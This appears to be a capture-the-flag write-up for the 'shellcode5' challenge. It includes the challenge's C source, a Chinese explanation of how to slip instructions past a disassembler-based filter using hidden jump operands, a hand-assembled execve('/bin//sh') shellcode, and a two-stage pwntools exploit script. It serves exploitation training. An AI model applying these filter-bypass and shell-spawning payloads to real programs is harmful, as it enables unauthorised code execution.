# shellcode5
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
#include <capstone/capstone.h>
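/*
 * Turn off stdio buffering on stdin and stdout so the program behaves the
 * same whether it is attached to a terminal or to a socket (the usual CTF
 * "upkeep" shim).
 *
 * Returns 0. The original was declared to return int but fell off the end
 * without a return statement, which is undefined behaviour if a caller ever
 * used the value.
 */
int upkeep(void) {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    return 0;
}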
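/*
 * Filter applied to the user-supplied buffer before main() jumps into it.
 *
 * Disassembles ptr[0..len) with Capstone (x86-64) in a single linear sweep
 * starting at offset 0 and accepts the buffer only if (a) every decoded
 * instruction has a mnemonic beginning with 'j' (jmp, jcc, jrcxz, ...) and
 * (b) the decoded instructions cover exactly len bytes.
 *
 * ptr: buffer to check (read only). len: number of bytes in it.
 *
 * Returns 1 when the buffer passes, 0 otherwise: Capstone could not be
 * opened, nothing decoded, a non-'j' mnemonic was seen, or the sweep stopped
 * before consuming all len bytes.
 *
 * NOTE(review): this is a linear-sweep check, not a control-flow check. It
 * never follows jump targets, so a 2-byte `jmp +1` (EB 01) can land
 * execution in the middle of what the sweep decoded as the rel32 operand of
 * a following `jmp rel32` (E9 xx xx xx xx); those four operand bytes then run
 * as whatever instruction they encode. Bytes that merely *look* like a stream
 * of j-instructions when read from offset 0 will pass.
 */
int validate(const char *ptr, size_t len) {
    csh handle;
    cs_insn *insn = NULL;   /* array allocated by cs_disasm, released with cs_free */
    int ret = 0;

    if (cs_open(CS_ARCH_X86, CS_MODE_64, &handle) != CS_ERR_OK) {
        return 0;
    }

    /* base address 0; count 0 asks Capstone to decode as much as it can */
    size_t count = cs_disasm(handle, (const uint8_t *)ptr, len, 0, 0, &insn);
    if (count > 0) {
        ret = 1;
        size_t covered = 0;
        for (size_t j = 0; j < count; j++) {
            ret &= insn[j].mnemonic[0] == 'j';
            covered += insn[j].size;
        }
        /* reject a buffer with an undecodable tail the sweep gave up on */
        ret &= (covered == len);
        cs_free(insn, count);
    }

    /* the original returned early on count == 0 and leaked the handle */
    cs_close(&handle);
    return ret;
}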
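/*
 * Entry point: read up to 4096 bytes of raw machine code from stdin, run it
 * through validate(), and jump to it if it passes.
 *
 * Returns 0 in every case (rejected input and read errors included).
 *
 * NOTE(review): code[] is on the stack, so this only works when the binary
 * is built with an executable stack; nothing in this listing changes page
 * protections even though <sys/mman.h> is included.
 */
int main(void) {
    upkeep();
    char code[4096];

    /* read() returns ssize_t. The original stored it in a size_t, so a -1
     * error became SIZE_MAX, passed the `n > 0` test, and handed validate()
     * a huge length (out-of-bounds read of the stack). */
    ssize_t n = read(STDIN_FILENO, code, sizeof code);
    if (n > 0 && validate(code, (size_t)n)) {
        /* treat the buffer as a function and call it */
        ((void (*)(void))code)();
    }
    return 0;
}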
要满足 validate() 的检查:线性反汇编出来的每条指令助记符都要以 j 开头(jmp/jcc 等),而且这些指令的长度之和必须正好等于输入长度。
关键在于 validate() 只从偏移 0 开始线性反汇编,从不跟随跳转目标。所以把 shellcode 按每 7 字节一组来构造:先放 `EB 01`(jmp +1,短跳过紧接着的 1 个字节),再放一个 `E9`;线性反汇编会把 `E9` 之后的 4 个字节当成 jmp rel32 的 32 位偏移吞掉,而真正执行时 CPU 跳过了 `E9`,直接从这 4 个字节开始执行——这里就放我们真正的指令(不足 4 字节用 `90` nop 补齐)。
每行 7 字节:`EB 01`(jmp +1)| `E9`(被跳过)| 真正执行的 4 字节(不足用 `90` 填充):

```
EB 01 E9 | 48 31 FF 90   xor rdi, rdi
EB 01 E9 | 48 31 F6 90   xor rsi, rsi
EB 01 E9 | 48 31 D2 90   xor rdx, rdx
EB 01 E9 | 48 31 C0 90   xor rax, rax
EB 01 E9 | 48 31 DB 90   xor rbx, rbx
EB 01 E9 | 50 90 90 90   push rax          ; 字符串后面的 NUL 终止符
EB 01 E9 | B3 68 90 90   mov bl, 'h'
EB 01 E9 | 48 C1 E3 08   shl rbx, 8
EB 01 E9 | B3 73 90 90   mov bl, 's'
EB 01 E9 | 48 C1 E3 08   shl rbx, 8
EB 01 E9 | B3 2F 90 90   mov bl, '/'
EB 01 E9 | 48 C1 E3 08   shl rbx, 8
EB 01 E9 | B3 2F 90 90   mov bl, '/'
EB 01 E9 | 48 C1 E3 08   shl rbx, 8
EB 01 E9 | B3 6E 90 90   mov bl, 'n'
EB 01 E9 | 48 C1 E3 08   shl rbx, 8
EB 01 E9 | B3 69 90 90   mov bl, 'i'
EB 01 E9 | 48 C1 E3 08   shl rbx, 8
EB 01 E9 | B3 62 90 90   mov bl, 'b'
EB 01 E9 | 48 C1 E3 08   shl rbx, 8
EB 01 E9 | B3 2F 90 90   mov bl, '/'       ; rbx = "/bin//sh"(小端)
EB 01 E9 | 53 90 90 90   push rbx
EB 01 E9 | 48 89 E7 90   mov rdi, rsp      ; rdi -> "/bin//sh\0"
EB 01 E9 | B0 3B 90 90   mov al, 0x3b      ; SYS_execve
EB 01 E9 | 0F 05 90 90   syscall           ; execve("/bin//sh", NULL, NULL),rsi/rdx 已清零
```
另一种写法是两阶段的 pwntools 脚本:第一阶段用同样的 j 开头技巧只做一次 read(0, buf, 255),把不受限制的 shellcode 读进同一块缓冲区,第二阶段直接发 shellcraft.sh():
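from pwn import *

# Two-stage exploit for shellcode5.
#
# validate() in the target accepts a buffer only if a *linear* Capstone sweep
# from offset 0 decodes nothing but j-mnemonic instructions that together
# cover every byte.  It never follows jump targets, so each 7-byte slot is
#
#     EB 01            jmp +1        (2 bytes, really executed)
#     E9 xx xx xx xx   jmp rel32     (what the sweep sees)
#        ^^ ^^ ^^ ^^   4 bytes of real code, executed once jmp +1 skips E9
#
# Stage 1 (three slots, 21 bytes) just calls read(0, code, 255) so the buffer
# gets overwritten with unconstrained shellcode; stage 2 supplies that.
elf = ELF("shellcode5")
context.log_level = "debug"
context.binary = elf

SKIP = asm("""
    jmp here+1
here:
""")                    # EB 01
JMP_REL32 = b"\xe9"     # the sweep swallows the next 4 bytes as this jmp's operand


def slot(body):
    """One 7-byte unit: jmp +1, E9, then exactly 4 bytes of real code.

    Short bodies are nop-padded.  A body longer than 4 bytes would spill out
    of the rel32 operand and be decoded by the sweep as its own instruction,
    so that is an error rather than a silent truncation.
    """
    assert len(body) <= 4, "slot body must fit in the rel32 operand (4 bytes)"
    return SKIP + JMP_REL32 + body.ljust(4, b"\x90")


# rsi = rdx, rdi = 0.  NOTE: relies on rdx still holding the address of the
# code buffer when main() jumps into it (observed for this build; re-check
# with a debugger if the binary is recompiled).
set_rdi_rsi = asm("""
    push rdx
    pop rsi
    xor edi, edi
""")
# rdx = 255.  Zero the whole register first; the original `mov al, 255;
# mov edx, eax` only gave 255 if the upper bytes of eax happened to be zero.
set_rdx = asm("""
    xor edx, edx
    mov dl, 255
""")
# rax = SYS_read (0), then read(0, rsi, 255)
set_rax_syscall = asm("""
    xor eax, eax
    syscall
""")

stage1 = slot(set_rdi_rsi) + slot(set_rdx) + slot(set_rax_syscall)

# After the syscall, rip is at code + len(stage1).  read() overwrote the buffer
# from its start, so pad len(stage1) bytes and put the real payload right there.
stage2 = b"A" * len(stage1) + asm(shellcraft.sh())
assert len(stage2) <= 255, "stage 2 must fit in the 255-byte read"

p = remote("127.0.0.1", 37251)
# p = process()
# p = elf.debug()
p.send(stage1)
# Do not let the two sends coalesce into the target's first read(0, code, 0x1000);
# stage 2 must arrive in the read issued by stage 1.
pause()
p.send(stage2)
p.interactive()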